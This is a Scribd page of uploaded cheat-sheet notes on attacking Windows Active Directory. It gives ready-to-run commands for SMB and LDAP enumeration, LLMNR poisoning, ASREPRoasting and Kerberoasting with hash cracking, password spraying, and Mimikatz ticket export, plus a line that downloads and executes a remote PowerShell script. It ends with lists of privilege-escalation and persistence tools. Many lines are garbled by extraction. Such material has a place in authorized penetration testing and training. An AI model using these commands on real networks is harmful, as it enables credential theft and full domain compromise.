Scribd
Upload
87 views7 pages

Windows AD Notes

Uploaded by

MRX Clay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
87 views7 pages

Windows AD Notes

Uploaded by

MRX Clay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

2.

Enumeration (AD)
 SMB-Enumeration

Ports-139,445

 It's very easy to obtain all the domain usernames from Windows:

net user /domain

Get-DomainUser

wmic useraccount get name,sid

 With No Creds

nbtscan {IP}

smbmap -H {IP}

smbmap -H {IP} -u null -p null

smbclient -N -L //{IP}

smbclient -N //{IP}/ --option="client min protocol"=LANMAN1

rpcclient {IP}

rpcclient -U "" {IP}

crackmapexec smb {IP}

crackmapexec smb {IP} --pass-pol -u "" -p ""

[Link] -dc-ip {IP} "{Domain_Name}/" -all

[Link] -dc-ip {IP} -request "{Domain_Name}/" -format hashcat

[Link] -dc-ip {IP} -request "{Domain_Name}/"

[Link] -target {IP}

 With Creds

smbmap -H {IP} -u {Username} -p {Password}

smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP}

smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP} --pw-nt-hash `hash`

crackmapexec smb {IP} -u {Username} -p {Password} --shares

[Link] {Domain_Name}/{Username}:{Password} -all

[Link] {Domain_Name}/{Username}:{Password} -request -format hashcat

[Link] {Domain_Name}/{Username}:{Password} -request


 Enum4Linux

Command: enum4linux -a {IP}

 Nmap SMB Scan 1

SMB Vuln Scan With Nmap

Command: nmap -p 139,445 -vv -Pn --script=[Link],smb-vuln-


[Link],[Link],[Link],smb-vuln-ms10-
[Link],[Link],[Link] {IP}

 Nmap Smb Scan 2

SMB Vuln Scan With Nmap (Less Specific)

Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}

 Check for null and Guest access on smb services

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

 LDAP Enumeration

Port_Number:389,636

 Banner Grab-LDAP

Command: nmap -p 389 --script ldap-search -Pn {IP}

 LdapSearch -Base LdapSearch

Command: ldapsearch -h {IP} -x

 LdapSearch -Naming Context Dump

Attempt to get LDAP Naming Context

Command: ldapsearch -h {IP} -x -s base namingcontexts

 LdapSearch -Big Dump :Need Naming Context to do big dump

Command: ldapsearch -h {IP} -x -b "{Naming_Context}"

 Poison the network


 LLMNR, NBT-NS, and mDNS Poisoning

-Gather credentials impersonating services with Responder

-Gather credentials exposing fake UPnP services with evil-SSDP


-Spoofing Scanner SSDP

-Spoofing Office365 SSDP

-Diverting User to a Password Vault SSDP

-Spoofing Microsoft Azure SSDP

 ASREPRoast

The ASREPRoast attack looks for users without Kerberos pre-authentication required
attribute (DONT_REQ_PREAUTH).

 Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

 Request AS_REP message

-Using Linux

#Try all the usernames in [Link]

>python [Link] [Link]/ -usersfile [Link] -format hashcat -


outputfile [Link]

#Use domain creds to extract targets and target them

>python [Link] [Link]/triceratops:Sh4rpH0rns -request -format


hashcat -outputfile [Link]

-Using Windows

.\[Link] asreproast /format:hashcat /outfile:[Link]

Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1


([Link]

 Cracking

john --wordlist=passwords_kerb.txt [Link]

hashcat -m 18200 --force -a 0 [Link] passwords_kerb.txt

 Password Spraying
 Get password policy

If you have some user credentials or a shell as a domain user you can get the
password policy with:

crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linx -u 'username' -p 'password' -P <IP>

(Get-DomainPolicy)."SystemAccess" #From powerview

3. Exploitation
 Using crackmapexec:

crackmapexec smb <IP> -u [Link] -p [Link]

 Using kerbrute(Go)

./kerbrute_linux_amd64 passwordspray -d [Link] domain_users.txt Password123

./kerbrute_linux_amd64 bruteuser -d [Link] [Link] thoffman

 With Rubeus version with brute module:


 with a list of users

.\[Link] brute /users:<users_file> /passwords:<passwords_file>


/domain:<domain_name> /outfile:<output_file>

 check passwords for all users in current domain

.\[Link] brute /passwords:<passwords_file> /outfile:<output_file>

 With the scanner/smb/smb_login module of Metasploit


 With Invoke-DomainPasswordSpray

Invoke-DomainPasswordSpray -UserList .\[Link] -Password 123456 –Verbose

4. Windows Exploitations Methods


 hash injection/ Pass-the-hash
 Pass the Ticket - Access as a user to the domain required
 Golden Ticket - Full domain compromise (domain admin) required
 Silver Ticket - Service hash required
 Skeleton Key - Full domain compromise (domain admin) required
 Kerberoast - Access as any user required

to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is
anyone since no special privileges are [Link] need valid credentials inside the domain.

-From linux

-msf> use auxiliary/gather/get_user_spns

-[Link] -request -dc-ip [Link] <[Link]>/<USERNAME> -


outputfile [Link] # Password will be prompted

-[Link] -request -dc-ip [Link] -hashes <LMHASH>:<NTHASH>


<DOMAIN>/<USERNAME> -outputfile [Link]

-From Windows, from memory to disk

- Get-NetUser -SPN | select serviceprincipalname #PowerView, get user service


accounts
 Get TGS in memory

- Add-Type -AssemblyName [Link]

- New-Object [Link] -
ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/[Link]

 klist #List kerberos tickets in memory

- Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current


folder

-From Windows

-Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex:


MSSQLSvc/[Link]

- .\[Link] kerberoast /outfile:[Link]

- iex (new-object
[Link]).DownloadString("[Link]
/data/module_source/credentials/Invoke-Kerberoast.ps1")

- Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding


ASCII [Link]

-Cracking

-john --format=krb5tgs --wordlist=passwords_kerb.txt [Link]

hashcat -m 13100 --force -a 0 [Link] passwords_kerb.txt

./[Link] [Link] 1-MSSQLSvc~[Link]~1433-


[Link]

5. Windows Local Privilege Escalation


1. Stored Credentials

2. Windows Kernel Exploit

3. DLL Injection
4. Unattended Answer File

5. Insecure File/Folder Permissions

6. Insecure Service Permissions

7. DLL Hijacking

8. Group Policy Preferences

9. Unquoted Service Path

10. Always Install Elevated

11. Token Manipulation

12. Insecure Registry Permissions

13. Autologon User Credential

14. User Account Control (UAC) Bypass

15.I nsecure Named Pipes Permissions

6. Tools
1. Mimikatz

2. Rubeus

3. Powersploit

4. Bloodhound

5. PowerView

6. Windows Exploit Suggester -[Link]

7. SessionGopher -[Link]

8. JAWS — Just Another Windows (Enum) Script -[Link]

9. windows-privesc-check -[Link]

10. Sherlock -[Link]

11. Windows Privesc Check (WPC-PS) -[Link]

12. PowerUp -[Link]

13. Metasploit Windows Gather Applied Patches

post/windows/gather/enum_patches

14. Metasploit Local Exploit Suggester Module

post/multi/recon/local_exploit_suggester

15. BeRoot -[Link]


16. Privesc -[Link]

17. Maintaining Persistence

exploit/windows/local/persistence

You might also like